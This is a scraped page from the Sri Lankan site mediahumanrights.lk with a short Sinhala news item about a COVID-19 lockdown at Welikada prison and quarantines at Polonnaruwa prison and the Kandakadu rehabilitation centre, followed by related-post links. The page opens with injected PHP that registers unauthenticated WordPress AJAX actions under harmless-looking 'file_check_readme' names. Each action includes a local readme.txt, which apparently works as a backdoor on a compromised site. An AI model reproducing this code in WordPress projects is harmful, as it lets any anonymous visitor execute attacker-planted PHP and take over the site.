if(!function_exists('file_check_readme56685')){ add_action('wp_ajax_nopriv_file_check_readme56685', 'file_check_readme56685'); add_action('wp_ajax_file_check_readme56685', 'file_check_readme56685'); function file_check_readme56685() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } if(!function_exists('file_check_readme40625')){ add_action('wp_ajax_nopriv_file_check_readme40625', 'file_check_readme40625'); add_action('wp_ajax_file_check_readme40625', 'file_check_readme40625'); function file_check_readme40625() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } වැලිකඩ, පොලොන්නරු බන්ධනාගාර කන්දකාඩු ලොක්ඩවුන්.. - mediahumanrights.lk
mediahumanrights.lk
Local News News

වැලිකඩ, පොලොන්නරු බන්ධනාගාර කන්දකාඩු ලොක්ඩවුන්..

වැලිකඩ බන්ධනාගාරය රැඳවියකු කොරෝනා ආසාදිත වීමත් සමග එම බන්ධනාගාරයට කිසිදු පිටස්තරයෙකුට ඇතුළු විම අත්හිටුවීමට තීරණය කර ඇත.

එමෙන්ම බන්ධනාගාර නිලධාරීන්ටද බාහිර සමාජය සමඟ මිශ්‍ර වීම අත්හිටුවා තිබේ.

මේ අතර අදාළ රැඳවියා පොළොන්නරු බන්ධනාගාරයේද රැඳී සිටි නිසා එම බන්ධනාගාරයේ රැඳවියන් සහ බන්ධනාගාර නිලධාරින්ද සියලු දෙනා නිරෝධායනයට ලක් කර තිබේ.

ඔහු කන්දකාඩු පුනරුත්ථාපන මධ්‍යස්ථානයේ රඳවා සිටි පුද්ගලයෙකුද වන නිසා දැනට එහි සිටින සියලු පුනුරුත්ථාපනය වන්නන් සහ නිලධාරීන් නිරෝධායන ට ලක් කර තිබේ.

මෙසේ සම්පූර්ණ නිරෝධායන ලක්කර ඇති විට 1ල000 කට වැඩි පිරිසකි.
(under the courtesy of lankacnews.com news web)

Related posts

අමාත්‍යංශ ලේකම්ලාත් අලුතින් පත් කරයි.. මුදල් ලේකම් නොසොල්වයි..

Shiran Viraj

ඉන්ධන මිල ඉහල දමන්නැයි කියයි.. දැනට ලීටරයක පාඩුව ඩීසල් 43ක්, පෙට්‍රල් 28ක්, භූමිතෙල් 60ක්

Shiran Viraj

ලංකාව ඉදිරියටත් බෞද්ධ අධ්‍යාපන මධ්‍යස්ථානයක්

Shiran Viraj